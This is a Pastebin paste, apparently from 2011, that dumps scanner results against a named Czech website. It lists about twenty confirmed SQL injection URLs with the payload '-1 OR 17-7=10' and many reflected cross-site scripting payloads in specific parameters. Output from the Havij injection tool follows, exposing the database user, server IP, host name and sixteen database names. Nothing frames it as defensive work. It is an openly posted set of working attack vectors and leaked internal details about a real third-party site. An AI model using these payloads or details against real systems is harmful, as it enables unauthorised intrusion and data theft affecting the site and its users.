API tools faq
paste
Advertisement
sroub3k

bbarak.cz

sroub3k
Dec 28th, 2011
285
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.96 KB | None | 0 0
raw download clone embed print report
  1. Boolean Based SQL Injection - BB.A.R.A.K.CZ
  2.  
  3. Severity : Critical
  4. Confirmation : Confirmed
  5. Detection Accuracy :
  6. Vulnerable URL : http://www.bbarak.cz/articles.php?cid=-1 OR 17-7=10
  7. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  8. Parameter Name: cid
  9. Parameter Type: Querystring
  10. Attack Pattern: -1 OR 17-7=10
  11.  
  12. Severity : Critical
  13. Confirmation : Confirmed
  14. Detection Accuracy :
  15. Vulnerable URL : http://www.bbarak.cz/news.php?id=-1 OR 17-7=10
  16. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  17. Parameter Name: id
  18. Parameter Type: Querystring
  19. Attack Pattern: -1 OR 17-7=10
  20.  
  21. Severity : Critical
  22. Confirmation : Confirmed
  23. Detection Accuracy :
  24. Vulnerable URL : http://www.bbarak.cz/reviews.php?cid=1&id=-1 OR 17-7=10
  25. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  26. Parameter Name: id
  27. Parameter Type: Querystring
  28. Attack Pattern: -1 OR 17-7=10
  29.  
  30. Severity : Critical
  31. Confirmation : Confirmed
  32. Detection Accuracy :
  33. Vulnerable URL : http://www.bbarak.cz/articles.php?cid=-1 OR 17-7=10&id=10115
  34. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  35. Parameter Name: cid
  36. Parameter Type: Querystring
  37. Attack Pattern: -1 OR 17-7=10
  38.  
  39. Severity : Critical
  40. Confirmation : Confirmed
  41. Detection Accuracy :
  42. Vulnerable URL : http://www.bbarak.cz/concerts.php?id=-1 OR 17-7=10
  43. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  44. Parameter Name: id
  45. Parameter Type: Querystring
  46. Attack Pattern: -1 OR 17-7=10
  47.  
  48. Severity : Critical
  49. Confirmation : Confirmed
  50. Detection Accuracy :
  51. Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid=102&cid=-1 OR 17-7=10&rid=10210&rreq=viewAll
  52. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  53. Parameter Name: cid
  54. Parameter Type: Querystring
  55. Attack Pattern: -1 OR 17-7=10
  56.  
  57. Severity : Critical
  58. Confirmation : Confirmed
  59. Detection Accuracy :
  60. Vulnerable URL : http://www.bbarak.cz/articles.php?cid=35&id=-1 OR 17-7=10
  61. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  62. Parameter Name: id
  63. Parameter Type: Querystring
  64. Attack Pattern: -1 OR 17-7=10
  65.  
  66. Severity : Critical
  67. Confirmation : Confirmed
  68. Detection Accuracy :
  69. Vulnerable URL : http://www.bbarak.cz/magazine.php?id=-1 OR 17-7=10
  70. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  71. Parameter Name: id
  72. Parameter Type: Querystring
  73. Attack Pattern: -1 OR 17-7=10
  74.  
  75. Severity : Critical
  76. Confirmation : Confirmed
  77. Detection Accuracy :
  78. Vulnerable URL : http://www.bbarak.cz/reviews.php?cid=-1 OR 17-7=10&from=0
  79. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  80. Parameter Name: cid
  81. Parameter Type: Querystring
  82. Attack Pattern: -1 OR 17-7=10
  83.  
  84. Severity : Critical
  85. Confirmation : Confirmed
  86. Detection Accuracy :
  87. Vulnerable URL : http://www.bbarak.cz/photoreports.php?id=-1 OR 17-7=10
  88. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  89. Parameter Name: id
  90. Parameter Type: Querystring
  91. Attack Pattern: -1 OR 17-7=10
  92.  
  93. Severity : Critical
  94. Confirmation : Confirmed
  95. Detection Accuracy :
  96. Vulnerable URL : http://www.bbarak.cz/interviews.php?id=-1 OR 17-7=10
  97. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  98. Parameter Name: id
  99. Parameter Type: Querystring
  100. Attack Pattern: -1 OR 17-7=10
  101.  
  102. Severity : Critical
  103. Confirmation : Confirmed
  104. Detection Accuracy :
  105. Vulnerable URL : http://www.bbarak.cz/liveshows.php?id=-1 OR 17-7=10
  106. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  107. Parameter Name: id
  108. Parameter Type: Querystring
  109. Attack Pattern: -1 OR 17-7=10
  110.  
  111. Severity : Critical
  112. Confirmation : Confirmed
  113. Detection Accuracy :
  114. Vulnerable URL : http://www.bbarak.cz/bazaar.php?cid=-1 OR 17-7=10
  115. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  116. Parameter Name: cid
  117. Parameter Type: Querystring
  118. Attack Pattern: -1 OR 17-7=10
  119.  
  120. Severity : Critical
  121. Confirmation : Confirmed
  122. Detection Accuracy :
  123. Vulnerable URL : http://www.bbarak.cz/links.php?id=-1 OR 17-7=10
  124. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  125. Parameter Name: id
  126. Parameter Type: Querystring
  127. Attack Pattern: -1 OR 17-7=10
  128.  
  129. Severity : Critical
  130. Confirmation : Confirmed
  131. Detection Accuracy :
  132. Vulnerable URL : http://www.bbarak.cz/press_news.php?id=-1 OR 17-7=10
  133. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  134. Parameter Name: id
  135. Parameter Type: Querystring
  136. Attack Pattern: -1 OR 17-7=10
  137.  
  138. Severity : Critical
  139. Confirmation : Confirmed
  140. Detection Accuracy :
  141. Vulnerable URL : http://www.bbarak.cz/inc/save_as_txt.php?tid=101&id=-1 OR 17-7=10
  142. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  143. Parameter Name: id
  144. Parameter Type: Querystring
  145. Attack Pattern: -1 OR 17-7=10
  146.  
  147. Severity : Critical
  148. Confirmation : Confirmed
  149. Detection Accuracy :
  150. Vulnerable URL : http://www.bbarak.cz/print.php?tid=101&cid=0&rid=-1 OR 17-7=10
  151. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  152. Parameter Name: rid
  153. Parameter Type: Querystring
  154. Attack Pattern: -1 OR 17-7=10
  155.  
  156. Severity : Critical
  157. Confirmation : Confirmed
  158. Detection Accuracy :
  159. Vulnerable URL : http://www.bbarak.cz/inc/send_as_email.php
  160. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  161. Parameter Name: id
  162. Parameter Type: Post
  163. Attack Pattern: -1 OR 17-7=10
  164.  
  165. Severity : Critical
  166. Confirmation : Confirmed
  167. Detection Accuracy :
  168. Vulnerable URL : http://www.bbarak.cz/author.php?id=-1 OR 17-7=10
  169. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  170. Parameter Name: id
  171. Parameter Type: Querystring
  172. Attack Pattern: -1 OR 17-7=10
  173.  
  174. Severity : Critical
  175. Confirmation : Confirmed
  176. Detection Accuracy :
  177. Vulnerable URL : http://www.bbarak.cz/readers_echos.php
  178. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  179. Parameter Name: cid
  180. Parameter Type: Post
  181. Attack Pattern: -1 OR 17-7=10
  182.  
  183. Severity : Critical
  184. Confirmation : Confirmed
  185. Detection Accuracy :
  186. Vulnerable URL : http://www.bbarak.cz/picture_photo.php?iid=-1 OR 17-7=10&pid=1469
  187. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  188. Parameter Name: iid
  189. Parameter Type: Querystring
  190. Attack Pattern: -1 OR 17-7=10
  191.  
  192.  
  193. ||| XSS
  194.  
  195. Severity : Important
  196. Confirmation : Confirmed
  197. Detection Accuracy :
  198. Vulnerable URL : http://www.bbarak.cz/articles.php?cid=" stYle="x:expre/**/ssion(alert(9)) &id=10115
  199. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  200. Parameter Name: cid
  201. Parameter Type: Querystring
  202. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
  203.  
  204. Severity : Important
  205. Confirmation : Confirmed
  206. Detection Accuracy :
  207. Vulnerable URL : http://www.bbarak.cz/articles.php?cid='"--></style></script><script>alert(0x000007)</script>
  208. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  209. Parameter Name: cid
  210. Parameter Type: Querystring
  211. Attack Pattern: '"--></style></script><script>alert(0x000007)</script>
  212.  
  213. Severity : Important
  214. Confirmation : Confirmed
  215. Detection Accuracy :
  216. Vulnerable URL : http://www.bbarak.cz/articles.php?cid="><ext/style=ext:expr/**/ession(alert(9))>
  217. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  218. Parameter Name: cid
  219. Parameter Type: Querystring
  220. Attack Pattern: "><ext/style=ext:expr/**/ession(alert(9))>
  221.  
  222. Severity : Important
  223. Confirmation : Confirmed
  224. Detection Accuracy :
  225. Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid='"--></style></script><script>alert(0x0001BE)</script>&cid=13&rid=10210&rreq=viewAll
  226. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  227. Parameter Name: tid
  228. Parameter Type: Querystring
  229. Attack Pattern: '"--></style></script><script>alert(0x0001BE)</script>
  230.  
  231. Severity : Important
  232. Confirmation : Confirmed
  233. Detection Accuracy :
  234. Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid="></style><script>alert(9)</script>&cid=13&rid=10210&rreq=viewAll
  235. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  236. Parameter Name: tid
  237. Parameter Type: Querystring
  238. Attack Pattern: "></style><script>alert(9)</script>
  239.  
  240. Severity : Important
  241. Confirmation : Confirmed
  242. Detection Accuracy :
  243. Vulnerable URL : http://www.bbarak.cz/interviews.php?cid="><script>alert(9)</script>&from=10
  244. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  245. Parameter Name: cid
  246. Parameter Type: Querystring
  247. Attack Pattern: "><script>alert(9)</script>
  248.  
  249. Severity : Important
  250. Confirmation : Confirmed
  251. Detection Accuracy :
  252. Vulnerable URL : http://www.bbarak.cz/liveshows.php?from='"--></style></script><script>alert(0x0006A2)</script>
  253. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  254. Parameter Name: from
  255. Parameter Type: Querystring
  256. Attack Pattern: '"--></style></script><script>alert(0x0006A2)</script>
  257.  
  258. Severity : Important
  259. Confirmation : Confirmed
  260. Detection Accuracy :
  261. Vulnerable URL : http://www.bbarak.cz/admin/images/magazines/pic_small_91.php/"ns="alert(0x00058A)
  262. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  263. Parameter Name: URI-BASED
  264. Parameter Type: RawUrlInjection
  265. Attack Pattern: /"ns="alert(0x00058A)
  266.  
  267. Severity : Important
  268. Confirmation : Confirmed
  269. Detection Accuracy :
  270. Vulnerable URL : http://www.bbarak.cz/search.php
  271. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  272. Parameter Name: string
  273. Parameter Type: Post
  274. Attack Pattern: '"--></style></script><script>alert(0x000582)</script>
  275.  
  276. Severity : Important
  277. Confirmation : Confirmed
  278. Detection Accuracy :
  279. Vulnerable URL : http://www.bbarak.cz/search.php
  280. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  281. Parameter Name: string
  282. Parameter Type: Post
  283. Attack Pattern: </a style=x:expre/**/ssion(alert(9))>
  284.  
  285. Severity : Important
  286. Confirmation : Confirmed
  287. Detection Accuracy :
  288. Vulnerable URL : http://www.bbarak.cz/photoreports.php?from='"--></style></script><script>alert(0x000624)</script>
  289. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  290. Parameter Name: from
  291. Parameter Type: Querystring
  292. Attack Pattern: '"--></style></script><script>alert(0x000624)</script>
  293.  
  294. Severity : Important
  295. Confirmation : Confirmed
  296. Detection Accuracy :
  297. Vulnerable URL : http://www.bbarak.cz/photoreports.php?from=0'"--></style></script><script>alert(0x00077C)</script>
  298. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  299. Parameter Name: from
  300. Parameter Type: Querystring
  301. Attack Pattern: 0'"--></style></script><script>alert(0x00077C)</script>
  302.  
  303. Severity : Important
  304. Confirmation : Confirmed
  305. Detection Accuracy :
  306. Vulnerable URL : http://www.bbarak.cz/news.php?from='"--></style></script><script>alert(0x000653)</script>
  307. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  308. Parameter Name: from
  309. Parameter Type: Querystring
  310. Attack Pattern: '"--></style></script><script>alert(0x000653)</script>
  311.  
  312. Severity : Important
  313. Confirmation : Confirmed
  314. Detection Accuracy :
  315. Vulnerable URL : http://www.bbarak.cz/news.php?from=0'"--></style></script><script>alert(0x00077B)</script>
  316. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  317. Parameter Name: from
  318. Parameter Type: Querystring
  319. Attack Pattern: 0'"--></style></script><script>alert(0x00077B)</script>
  320.  
  321. Severity : Important
  322. Confirmation : Confirmed
  323. Detection Accuracy :
  324. Vulnerable URL : http://www.bbarak.cz/interviews.php?from='"--></style></script><script>alert(0x000673)</script>
  325. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  326. Parameter Name: from
  327. Parameter Type: Querystring
  328. Attack Pattern: '"--></style></script><script>alert(0x000673)</script>
  329.  
  330. Severity : Important
  331. Confirmation : Confirmed
  332. Detection Accuracy :
  333. Vulnerable URL : http://www.bbarak.cz/interviews.php?from=0'"--></style></script><script>alert(0x00077A)</script>
  334. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  335. Parameter Name: from
  336. Parameter Type: Querystring
  337. Attack Pattern: 0'"--></style></script><script>alert(0x00077A)</script>
  338.  
  339. Severity : Important
  340. Confirmation : Confirmed
  341. Detection Accuracy :
  342. Vulnerable URL : http://www.bbarak.cz/interviews.php?cid=3&from='"--></style></script><script>alert(0x0006A3)</script>
  343. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  344. Parameter Name: from
  345. Parameter Type: Querystring
  346. Attack Pattern: '"--></style></script><script>alert(0x0006A3)</script>
  347.  
  348. Severity : Important
  349. Confirmation : Confirmed
  350. Detection Accuracy :
  351. Vulnerable URL : http://www.bbarak.cz/interviews.php?cid=3&from="></script><script>alert(9)</script>
  352. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  353. Parameter Name: from
  354. Parameter Type: Querystring
  355. Attack Pattern: "></script><script>alert(9)</script>
  356.  
  357. Severity : Important
  358. Confirmation : Confirmed
  359. Detection Accuracy :
  360. Vulnerable URL : http://www.bbarak.cz/liveshows.php?cid='"--></style></script><script>alert(0x0006BE)</script>&from=10
  361. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  362. Parameter Name: cid
  363. Parameter Type: Querystring
  364. Attack Pattern: '"--></style></script><script>alert(0x0006BE)</script>
  365.  
  366. Severity : Important
  367. Confirmation : Confirmed
  368. Detection Accuracy :
  369. Vulnerable URL : http://www.bbarak.cz/liveshows.php?cid='"--></style></script><script>alert(0x00077E)</script>&from=10
  370. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  371. Parameter Name: cid
  372. Parameter Type: Querystring
  373. Attack Pattern: '"--></style></script><script>alert(0x00077E)</script>
  374.  
  375. Severity : Important
  376. Confirmation : Confirmed
  377. Detection Accuracy :
  378. Vulnerable URL : http://www.bbarak.cz/admin/images/magazines/pic_banner_91.php/"ns="alert(0x0006FE)
  379. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  380. Parameter Name: URI-BASED
  381. Parameter Type: RawUrlInjection
  382. Attack Pattern: /"ns="alert(0x0006FE)
  383.  
  384. Severity : Important
  385. Confirmation : Confirmed
  386. Detection Accuracy :
  387. Vulnerable URL : http://www.bbarak.cz/press_news.php?from="><body onload=alert(9)>
  388. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  389. Parameter Name: from
  390. Parameter Type: Querystring
  391. Attack Pattern: "><body onload=alert(9)>
  392.  
  393. Severity : Important
  394. Confirmation : Confirmed
  395. Detection Accuracy :
  396. Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid='"--></style></script><script>alert(0x000816)</script>&cid=0&rid=3940&req=addForm
  397. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  398. Parameter Name: tid
  399. Parameter Type: Querystring
  400. Attack Pattern: '"--></style></script><script>alert(0x000816)</script>
  401.  
  402.  
  403. ||| Havij |||
  404.  
  405. Target: http://www.bbarak.cz/articles.php?cid=-1 OR 17-7=10
  406. Keyword Found: autor
  407. Injection type is Integer
  408.  
  409. Web Server: Apache
  410. DB Server: MySQL
  411.  
  412. ||| Info |||
  413.  
  414. Current User: bbarak.cz@93.185.104.22
  415. Current DB: bbarak_cz
  416. System User: bbarak.cz@93.185.104.22
  417. Host Name: www4
  418. Installation dir: /usr/local/
  419. Db user: 'bbarak.cz'@'%'
  420.  
  421. Data Base Found: information_schema
  422. Data Base Found: ads_bbarak_cz
  423. Data Base Found: bbarak_cz
  424. Data Base Found: bugs_bbarak_cz
  425. Data Base Found: charta_bbarak_cz
  426. Data Base Found: chat_bbarak_cz
  427. Data Base Found: click_bbarak_cz
  428. Data Base Found: colas_bbarak_cz
  429. Data Base Found: counter_bbarak_cz
  430. Data Base Found: etickets_bbarak_cz
  431. Data Base Found: ilbau_bbarak_cz
  432. Data Base Found: records_bbarak_cz
  433. Data Base Found: shop_bbarak_cz
  434. Data Base Found: tasks_bbarak_cz
  435. Data Base Found: tiskovky_bbarak_cz
  436. Data Base Found: urbanrapublic_bbarak_cz
  437.  
  438. |||
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!